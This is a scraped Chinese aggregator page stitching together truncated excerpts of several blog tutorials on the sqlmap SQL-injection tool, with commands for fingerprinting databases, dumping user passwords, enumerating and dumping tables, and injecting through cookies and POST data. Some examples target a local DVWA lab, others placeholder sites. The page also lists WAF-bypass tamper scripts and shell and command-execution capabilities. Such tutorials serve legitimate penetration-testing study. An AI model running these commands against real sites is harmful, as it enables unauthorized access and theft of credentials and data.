sqlmap post注入

SQLMAP 使用笔记

匿名 (未验证) 提交于 2019-12-03 00:30:01
简单的注入流程: 1.读取数据库版本,当前用户,当前数据库 sqlmap -u http://www.xx.com/test.php?p=2 -f -b --current-user --current-db -v 1 2.判断当前数据库用户权限 sqlmap -u http://www.xx.com/test.php?p=2 --privileges -U 用户名 -v 1 sqlmap -u http://www.xx.com/test.php?p=2 --is-dba -U 用户名 -v 1 3.读取所有数据库用户或指定数据库用户的密码 sqlmap -u http://www.xx.com/test.php?p=2 --users --passwords -v 2 sqlmap -u http://www.xx.com/test.php?p=2 --passwords -U root -v 2 4.获取所有数据库 sqlmap -u http://www.xx.com/test.php?p=2 --dbs -v 2 5.获取指定数据库中的所有表 sqlmap -u http://www.xx.com/test.php?p=2 --tables -D mysql -v 2 6.获取指定数据库名中指定表的字段 sqlmap -u http://www.xx.com/test

sqlmap工具的使用

独自空忆成欢 提交于 2019-12-02 23:59:00
sqlmap工具的使用: sql注入工具:明小子,啊d、罗卜头、穿山甲、sqlmap等等 开源自动化注入利用工具,支持的数据库有12种,在/plugins中可以看到支持的数据库种类,在所有注入利用工具中他是最好的!! 支持的注入类型:bool、时间、报错、联合、、堆查询、内联 可以获取用户名、密码、权限、角色、数据库(表、、字段、内容) 可以爆破识别密文数据 getshell 命令执行 脱库/删除 目录介绍: doc介绍文档 extra 是sqlmap额外的功能运行CMD执行命令 lib是sqlmap核心功能代码 pluigifins 包含12种数据库识别程序 data 存放一些工具过程中使用的工具或命令 procs 包含了mssql mysql oracle postgresql shell 远程命令和后门 txt 表名列名、ua字典 udf 存放攻击载荷payload xml 存放检测的脚本 tamper 包含各种绕waf的处理脚本 thirdparty包含了第三方插件,颜色,优化等 sqlmap工作流程 (1)、初始化 (2)、开始检测 0>检测之前是否注入过(会把检测的url默认存放在家目录中.sqlmap下的output --output-dir参数可以指定存放的目录) 1>解析url,判断该url是否可访问 2>检测是否有WAF sqlmap -u“目录url” -

sqlmap的post注入

匿名 (未验证) 提交于 2019-12-02 23:55:01
Ŀ¼ sqlmap的POST注入 cookie注入暴数据库 POST注入 cookie:user=admin"flag参数 验证Cookie: user=admin’ and ‘1’=1’flag,说明这种情况就存在注入 >>这里是修改cookie后进行注入的,那么要结合cookie注入来看post注入的原理,其实两个是要联合进行注入的,互不影响。 cookie注入 1.暴数据库 >>可以看到有四个数据库 POST文件1.txt这里要写文件位置如:/root/1.txt cookie要写成:--cookie="user=admin" 指定数据库类型:--dbms=mysql 暴数据库:--dbs 2.猜表 >>猜出employee数据库下有三个表 猜表:--tables 其它的参数不变 3.表fllaagg中的列 猜列:--columns 4.猜表中的字段 >>找到包含flag的字段 猜字段:--dump 来源:博客园 作者: 请叫我阿毛 链接:https://www.cnblogs.com/loopkep/p/11406765.html

SQLmap命令详解

匿名 (未验证) 提交于 2019-12-02 23:43:01
来源于网络,侵权请通知我删除,*请不要转载 Options(选项): --version 显示程序的版本号并退出 -h, --help 显示此帮助消息并退出 -v VERBOSE 详细级别:0-6(默认为 1) Target(目标): 以下至少需要设置其中一个选项,设置目标 URL 。 -d DIRECT 直接连接到数据库。 -u URL, --url=URL 目标 URL。 -l LIST 从Burp 或WebScarab 代理的日志中解析目标。 -r REQUESTFILE 从一个文件中载入 HTTP 请求。 -g GOOGLEDORK 处理 Google dork 的结果作为目标 URL。 -c CONFIGFILE 从INI 配置文件中加载选项。 Request(请求):: 这些选项可以用来指定如何连接到目标 URL。 --data=DATA 通过 POST 发送的数据字符串 --cookie=COOKIE HTTP Cookie ͷ --cookie-urlencode URL 编码生成的 cookie 注入 --drop-set-cookie 忽略响应的 Set - Cookie 头信息 --user-agent=AGENT 指定 HTTP User - Agent 头 --random-agent 使用随机选定的 HTTP User - Agent 头 -

kali之使用sqlmap进行sql注入

匿名 (未验证) 提交于 2019-12-02 23:43:01
sqlmap简介 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4、联合查询注入,可以使用union的情况下的注入。 5、堆查询注入,可以同时执行多条语句的执行时的注入。 sqlmap支持的数据库有 MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB cookie注入 登录网页后在浏览器url栏输入 javascript:document.cookie或者在console栏中输入document.cookie即可获得cookie sqlmap -u "http://可能注入的某个提交参数的url" --cookie="这次提交的cookie" dvwa中测试 sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low;

sqlmap 注入的方法及技巧

时光怂恿深爱的人放手 提交于 2019-12-02 23:36:32
sqlmap 注入的方法及技巧 当给 sqlmap 这么一个 url 的时候,它会: 1、判断可注入的参数 2、判断可以用那种 SQL 注入技术来注入 3、识别出哪种数据库 4、根据用户选择,读取哪些数据 sqlmap 支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查 看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返 回在页面中。 4、联合查询注入,可以使用 union 的情况下的注入。 5、堆查询注入,可以同时执行多条语句的执行时的注入。 sqlmap 支持的数据库有: MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase 和 SAP MaxDB 可以提供一个简单的 URL,Burp 或 WebScarab 请求日志文件,文本文档 中的完整 http 请求或者 Google 的搜索,匹配出结果页面,也可以自己定义一 个正则来判断那个地址去测试。 测试 GET 参数,POST 参数,HTTP Cookie 参数,HTTP User-Agent 头 和

sqlmap常用命令

倾然丶 夕夏残阳落幕 提交于 2019-12-02 19:14:23
--dbnms -- --common-tables 暴力猜表名 -u #注入点 -f #指纹判别数据库类型 -b #获取数据库版本信息 -p #指定可测试的参数(?page=1&id=2 -p “page,id”) -D “” #指定数据库名 -T “” #指定表名 -C “” #指定字段 -s “” #保存注入过程到一个文件,还可中断,下次恢复在注入(保存:-s “xx.log” 恢复:-s “xx.log” –resume) –columns #列出字段 –current-user #获取当前用户名称 –current-db #获取当前数据库名称 –users #列数据库所有用户 –passwords #数据库用户所有密码 –privileges #查看用户权限(–privileges -U root) -U #指定数据库用户 –dbs #列出所有数据库 –tables -D “” #列出指定数据库中的表 –columns -T “user” -D “mysql” #列出mysql数据库中的user表的所有字段 –dump-all #列出所有数据库所有表 –exclude-sysdbs #只列出用户自己新建的数据库和表 –dump -T “数据库” -D “表” -C “字段” #列出指定数据库的表的字段的数据(–dump -T users -D master -C

(九)DVWA之SQL Injection--SQLMap&Fiddler测试(High)

爱⌒轻易说出口 提交于 2019-12-02 15:31:29
一、测试需求分析 测试对象 :DVWA漏洞系统--SQL Injection模块--ID提交功能 防御等级 :High 测试目标 :判断被测模块是否存在SQL注入漏洞,漏洞是否可利用,若可以则检测出对应的数据库数据 测试方式 :手工+Fiddler+ SQLMap工具 url: http://localhost:8001/dvwa/vulnerabilities/sqli/ 被测模块(防御:High) session-input.php代码 <?php define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' ); require_once DVWA_WEB_PAGE_TO_ROOT . 'dvwa/includes/dvwaPage.inc.php'; dvwaPageStartup( array( 'authenticated', 'phpids' ) ); $page = dvwaPageNewGrab(); $page[ 'title' ] = 'SQL Injection Session Input' . $page[ 'title_separator' ].$page[ 'title' ]; if( isset( $_POST[ 'id' ] ) ) { $_SESSION[ 'id' ] = $_POST[ 'id' ]; //$page[

SQLMAP参数介绍

牧云@^-^@ 提交于 2019-12-02 15:17:44
sqlmap的使用方式:python sqlmap.py [options]; sqlmap中一共有以下十六个选项卡: 帮助选项卡; Target(目标选项卡); Request(请求选项卡); Optimization(优化选项卡); Injection(注射选项卡); Detection(探测选项卡); Techniques(注入技术选项卡); Fingerprint(指纹选项卡); Enumeration(列数据选项卡); Brute force(爆破选项卡); User-defined function injection(用户自定义函数注入选项卡); File system access(系统文件操作选项卡); Operation system access(操作系统访问选项卡); Windows registry access(Windows注册表选项卡); General(一般选项卡); Miscellaneous(杂项); 1、帮助选项卡 -h, –help 显示基础的帮助信息并退出; -hh 显示进一步的帮助信息并退出; –version 显示程序的版本并退出; -v VERBOSE 详细级别:0-6(默认为1); 2、Target(目标选项卡):在这些选项卡中至少有一个要设置目标 -d DIRECT 直接连接到数据库; -u URL, –url=URL

超详细SQLMap使用攻略及技巧

笑着哭i 提交于 2019-12-02 11:12:57
超详细SQLMap使用攻略及技巧 sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。 sqlmap目前最新版本为1.1.8-8,相关资源如下: 官方网站: http://sqlmap.org/ , 下载地址: https://github.com/sqlmapproject/sqlmap/zipball/master 演示视频: https://asciinema.org/a/46601 教程: http://www.youtube.com/user/inquisb/videos 1.1 sqlmap简介 sqlmap支持MySQL, Oracle,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird,Sybase和SAP MaxDB等数据库的各种安全漏洞检测。 sqlmap支持五种不同的注入模式: l 基于布尔的盲注,即可以根据返回页面判断条件真假的注入; l 基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行